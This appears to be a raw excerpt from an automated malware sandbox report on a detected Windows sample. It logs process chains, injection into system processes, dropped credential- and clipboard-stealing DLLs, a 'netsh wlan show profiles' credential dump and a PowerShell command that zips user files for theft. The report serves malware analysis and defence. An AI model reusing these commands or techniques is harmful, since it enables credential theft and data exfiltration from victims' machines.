                              Source: yINR7uQlPr.exeReversingLabs: Detection: 75%
                              Source: EC2F.tmp.gfx.exeString found in binary or memory: " /add
                              Source: EC2F.tmp.gfx.exeString found in binary or memory: " /add /y
                              Source: Gxtuum.exeString found in binary or memory: " /add
                              Source: Gxtuum.exeString found in binary or memory: " /add /y
                              Source: Gxtuum.exeString found in binary or memory: " /add
                              Source: Gxtuum.exeString found in binary or memory: " /add /y
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeFile read: C:\Users\user\Desktop\yINR7uQlPr.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\yINR7uQlPr.exe "C:\Users\user\Desktop\yINR7uQlPr.exe"
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe"
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe"
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe"
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeProcess created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe"
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe"
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe "C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe"
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Users\user\AppData\Local\Temp\10000820101\update.exe "C:\Users\user\AppData\Local\Temp\10000820101\update.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Users\user\AppData\Local\Temp\10000830101\update.exe "C:\Users\user\AppData\Local\Temp\10000830101\update.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe "C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe"
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe" Jump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe" Jump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe" Jump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe" Jump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe "C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeProcess created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Users\user\AppData\Local\Temp\10000820101\update.exe "C:\Users\user\AppData\Local\Temp\10000820101\update.exe"
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Users\user\AppData\Local\Temp\10000830101\update.exe "C:\Users\user\AppData\Local\Temp\10000830101\update.exe"
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe "C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe"
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                              Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
                              Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeSection loaded: vcruntime140.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeSection loaded: libffi-7.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: dwrite.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: mstask.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: dui70.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: duser.dll
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeSection loaded: chartv.dll
